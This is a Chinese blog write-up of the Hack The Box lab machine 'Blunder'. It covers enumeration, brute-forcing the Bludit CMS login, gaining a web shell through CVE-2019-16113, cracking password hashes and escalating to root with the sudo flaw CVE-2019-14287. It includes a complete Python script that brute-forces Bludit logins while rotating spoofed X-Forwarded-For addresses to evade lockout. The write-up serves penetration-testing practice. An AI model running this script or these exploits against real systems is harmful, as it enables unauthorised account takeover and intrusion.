Hack The Box——Blunder

最新推荐文章于 2024-05-28 10:25:19 发布
最新推荐文章于 2024-05-28 10:25:19 发布
阅读量1.5w 收藏 1
点赞数
分类专栏: HackTheBox靶机 文章标签: Hack The Box HTB-Blunder 渗透测试实例 CVE-2019-16113 CVE-2019-14287
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/108173617
版权

目录

简介

信息收集

漏洞发现

暴力破解

CVE-2019-16113

漏洞利用

权限提升

凭据发现

CVE-2019-14287

总结

简介

靶机虽然不难,但是花费的时间不少。通过搜索可以发现Bludit CMS的已知漏洞,但是要利用该漏洞就需要登录到后台,因此需要枚举用户名和密码。通过todo.txt文件中的的信息猜测到用户名,然后爆破破解获得密码,接着利用CVE-2019-16113获得WebShell,然后通过枚举本地文件发现存储在php文件中的用户hugo的密码Hash值,通过解密获得用户hugo的密码。从而获得该用户的Shell,最后利用CVE-2019-14287提升至root权限。

信息收集

使用nmap快速扫描目标主机端口和服务,目标主机仅开启了80端口,运行这Apache httpd 2.4.41,操作系统为Ubuntu,内核可能为2.6.32,如图:

然后访问80端口web服务,发现是作者记录的一些文章,如图:

随手输入admin发现页面跳转到登录页面,如图:

测试发现不存在常用弱口令和SQL注入漏洞,使用Google搜索BLUDIT发现此CSM系统存在已知漏洞,如目录遍历图像文件上传(CVE-2019-16113)和暴力破解绕过。目录遍历图像上传漏洞需要拥有用户名和密码才能利用。查看网页源码发现版本号,如图:

通过Google搜索到Bludit暴力破解绕过的博客,当然也可以根据原理自行编写脚本(部分代码没进行异常处理):

#!/usr/bin/python3
import requests
import argparse
import random

#define parm
parser=argparse.ArgumentParser()
group=parser.add_mutually_exclusive_group()
parser.add_argument('-H','--host',help='target hostname or ip address',type=str)
parser.add_argument('-p','--port',help='target port,default 80',default=80,type=int)
group.add_argument('-u','--username',help='Bludit CMS username',type=str)
group.add_argument('-U','--userfile',help='Bludit CMS username list file',type=str)
parser.add_argument('-P','--password',help='password dictionary file',type=str)
args=parser.parse_args()

if args.host:
    url='http://'+args.host.strip()+'/admin/login'
    if args.password:
        if args.username:
            username=args.username.strip()
            s=requests.session()

            with open(args.password) as f:
                password=f.readline()
                password=password.strip()
                while password:
                    try:
                        r=s.get(url)
                    except KeyboardInterrupt:
                        break
                    except:
                        print('Could not connect to '+args.host+'!')

                    token=r.text
                    token=token.split('tokenCSRF')
                    token=token[2][9:49]

                    random_ip=str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))
                    head={'X-Forwarded-For':random_ip,'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'}
                    data={'tokenCSRF':token,'username':username,'password':password}
                    print('[*] Testing: Username [',username,'] and Password [',password,']')
                    r=s.post(url,headers=head,data=data,allow_redirects=False)
                    try:
                        success=r.headers['Location']
                    except:
                        success=''
                    if success == '/admin/dashboard':
                        print("\033[1;32;1m[+] Success! Username:",username,'Password:',password,"\033[0m")
                        break
                    password=f.readline()
                    password=password.strip()

        elif args.userfile:
            try:
                userfile=open(args.userfile.strip(),'r').read()
            except FileNotFoundError:
                print("Please give me a vilid file!")

            s=requests.session()
            for username in userfile.split():
                with open(args.password) as f:
                    password=f.readline()
                    password=password.strip()
                    while password:
                        try:
                            r=s.get(url)
                        except:
                            print('Could not connect to '+args.host+'!')

                        token=r.text
                        try:
                            token=token.split('tokenCSRF')
                            token=token[2][9:49]
                        except:
                            pass

                        random_ip=str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))
                        head={'X-Forwarded-For':random_ip,'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'}
                        data={'tokenCSRF':token,'username':username,'password':password}
                        print('[*] Testing: Username [',username,'] and Password [',password,']')
                        r=s.post(url,headers=head,data=data,allow_redirects=False)
                        try:
                            success=r.headers['Location']
                        except KeyboardInterrupt:
                            exit()
                        except:
                            success=''
                        if success == '/admin/dashboard':
                            print("\033[1;32;1m[+] Success! Username:",username,'Password:',password,"\033[0m")
                            exit()
                        password=f.readline()
                        password=password.strip()
        else:
            print("You must give -u or -U,and just only one!")

    else:
        print("Please give me a password file")
else:
    print("Please enter the -h parameter for detailed usage.")

将admin、bludit、blunder和首页出现的人名保存为用户字典文件,然后使用cewl -m 4 http://10.10.10.191 -w passwd.txt将首页的单词提权为密码字典文件,但是没获得登录凭据,尝试使用rockyou字典,也未破解成功。使用dirbuster扫描目录扫着扫着程序崩溃了,如图:

然后使用wfuzz继续扫描bak,txt,sql,zip等文件,发现存在todo.txt,如图:

然后查看todo.txt,发现可能为用户名的单词,如图:

漏洞发现

暴力破解

然后使用网站提取的字典passwd.txt暴力破解发现密码,如图:

使用该用户名和密码登录系统,如图:

CVE-2019-16113

使用Exploit-DB提供的漏洞利用代码测试是否存在CVE-2019-16113,如图:

在本地监听的端口获得HTTP请求,如图:

说明目标主机存在该漏洞。

漏洞利用

构造反弹shell的payload,如图:

成功获得WebShell,如图:

权限提升

查看/etc/passwd文件发现三个普通用户,如图:

进入查看/home目录未发现temp的用户目录,如图:

凭据发现

查看上级目录,在databases目录下发现php文件,在users.php文件中发现管理员用户Admin和fergus用户的Hash值和盐值,如图:

使用hash-identifier查看Hash类型,如图:

使用john和hashes.com均未破解成功,在/var/www目录下发现另一个版本的bludit,如图:

查看databases目录下的users.php文件中发现管理员用户Hugo的密码Hash值,如图:

使用john未破解成功,但使用hashes.com破解成功,如图:

尝试使用该密码登录到hugo用户的Shell,如图:

CVE-2019-14287

使用提权辅助lse.sh发现sudo命令可执行的程序,如图:

使用Google搜索发现可以利用CVE-2019-14287,如图:

成功获得root权限。

总结

该靶机用到的枚举较多,所以花费的时间较长。在扫描网站目录和文件时发现dirbuster容易崩溃,wfuzz貌似更好用些。在破解Bludit登录用户名和密码是花时间最多的,在此之后就一帆风顺了,Google都能找得到。

江左盟宗主
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-Nibbles(考点:nibbles安全&上传/linux修改脚本)
冬萍子癸水
04-11 451
nmap 点开80,太简洁 dirbuster扫一扫,扫不出什么, 没什么信息,只能继续信息搜集,ctrl+u,看到这个 ok这是个nibbles博客,查一查就知道是个博客系统。提示了这个新目录 重现拿dirbuster扫这个新目录。发现登陆页面 没有账号密码信息,暴力破解之前,要先猜弱口令。因为有nibble,所以和admin这些混合起来猜。 还好不难,admin+nibbles 进入到...
hackthebox - blunder (Bludit渗透&cewl使用 & sudo提权)
冬萍子癸水
01-09 866
C:\root> masscan -p1-65535,U:1-65535 10.10.10.191 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-01-08 00:00:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts
Hack the box靶机 Blunder
菜浪马废的博客
09-20 413
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
HackTheBox-Machines--Lame
最新发布
七天
05-28 308
枚举共享驱动器,并查看权限,发现/tmp目录具有读取和写入权限。使用hydra、medusa等工具进行暴力破解。
HackTheBox::Blunder
aya3t的博客
10-14 331
HackTheBox::Blunder
hackthrbox-DevOops(考点:xxe攻击xml伪造/ssh_key/git)
冬萍子癸水
04-08 323
nmap走起 http开在了5000,而且有22,看到了22的ssh就应该想到很可能是拿id_rsa进行ssh登录拿shell 扫5000: gobuster -w directory-list-lowercase-2.3-medium.txt -u http://10.10.10.91:5000 -t 150 -s “200,204,301,302,307,403,401” /upload,当...
Blunder-开源
04-15
Blunder是用于分析Java中的链式异常的自动化工具。 这对于分类,生成自定义的错误消息以及可能的解决方案列表很有用。
Blunder Chess Tools-开源
04-27
与国际象棋有关的软件工具库。 当前包括一个完整的程序包,用于分析您的游戏,搜索错误和错过的机会,然后反复检查它们,从而改善您的游戏。
blunder:ES6处理错误的组件
05-16
Blunder.js ES6处理错误的组件 import MultiError from "blunder" ; const multiError = new Blunder ( [ new Error ( "some error" ) , new Error ( "some other" ) ] ) ; //you can use an array or just one ...
blunder:现代客户端 JavaScript 错误处理程序
05-31
错误 现代客户端 JavaScript 错误处理程序 安装 下载 、 、 版本或通过 NPM 安装: npm install @ryanmorr/blunder 用法 Blunder 提供了在浏览器中增强、分派、... // Send the error to the server report ( '/pat
blunder:我犯了一个巨大的错误
06-20
欢迎使用 Blunder,这是管理 Ruby 应用程序依赖项的最糟糕方法。 通过随机卸载所需的确切 gem 和版本,Blunder 为 Ruby 项目提供了不一致的环境。 安装 将此行添加到应用程序的 Gemfile 中: gem 'blunder' , git ...
10个轻量级CMS网站内容管理系统
07-26
NULL 博文链接:https://justcoding.iteye.com/blog/624188
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子 Hack The Box笔测试和来自挑战 在这里,我们有Hack The Box的演练。
bludit:简单,快速,安全,平面文件CMS
02-03
简单,快速和灵活的CMS。 Bludit是一个Web应用程序,可在几秒钟内构建您自己的网站或博客,它是完全免费和开源的。 Bludit使用JSON格式的文件来存储内容,您无需安装或配置数据库。 您只需要具有PHP支持的Web服务器。 Bludit是平面文件CMS。 Bludit支持Markdown和内容的HTML代码。 帮助和支持和 Bludit v4 我正在使用Bludit v4,但第一个Alpha或Beta版本没有ETA。 您可以在新分支v4.0和博客文章关注更改。 我正在大量重构Bludit的核心,因此请耐心等待,让我发布Alpha版本,然后再将更改推送到分支v4.0 。 欢
hackthebox - TartarSauce (考点:信息搜集/wp漏洞)(未完成)
冬萍子癸水
04-15 421
nmap 就一个80,里面一张酸酸乳样的照片 然后打开robots.txt,看到webservices似乎有很多料,点看看看未发现太多 同时,扫目录也发现了webservices 继续深挖,扫webservices里面还有啥。 看到wp。wordpress的简称 看到wp就要想到用wpscan扫他 wpscan --url http://10.10.10.88/webservices/wp ...
vulnhub靶机-ODIN: 1
臭nana的博客
01-06 1449
靶机描述: 1、找到靶机ip:192.168.75.14 nmap -sn 192.168.75.14 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.14 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for odin (192.168.75.14) Host is up (0.00047s latency). Not shown: 65534 closed ports
Metasploit学习之渗透测试基础
习惯积淀的博客
12-31 321
文章目录渗透测试基础PTES标准中的渗透测试阶段渗透测试类型漏洞扫描器 渗透测试基础 PTES标准中的渗透测试阶段 前期交互阶段 与客户组织进行讨论,确定渗透测试的范围和目标。这个阶段最为关键的是需要让客户了解渗透测试将涉及哪些目标。而这个阶段也为你提供了机会,来说服客户走出全范围渗透测试的理想化愿景,选择更加现实可行的渗透测试目标来进行实际实施。 情报搜集阶段 采取各种可能的方法来搜集将要攻击...
一级必杀,防不胜防的漏洞,WEB安全基础入门—文件上传漏洞
Eason_LYC安全白帽子的成长博客
06-27 2046
文件上传漏洞指缺失或可绕过对拟上传文件的名字、类型、内容或大小进行验证。导致实际可上传恶意文件,如脚本或木马。造成远程命令执行、敏感信息泄露等危害。
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
weixin_64655821的博客
10-13 1982
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
[hackthebox]shibboleth
weixin_45751765的博客
03-04 4172
0x00 前言 这次的靶场又让我排了点坑 由于习惯原因 我一直使用windows的wsl监听端口反弹shell后不能wget windows物理机能ping通靶机 但靶机ping不通windows物理机 但用kali虚拟机监听端口反弹shell后就能正常wget 并且互相都ping得通 好奇妙… 但此处依然存在疑问: 如果说使用windows wsl监听反弹shell存在连通性问题(即靶机无法联通windows wsl),那么为什么用windows wsl监听反弹shell能成功收到…? 回到正题 这次的靶

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值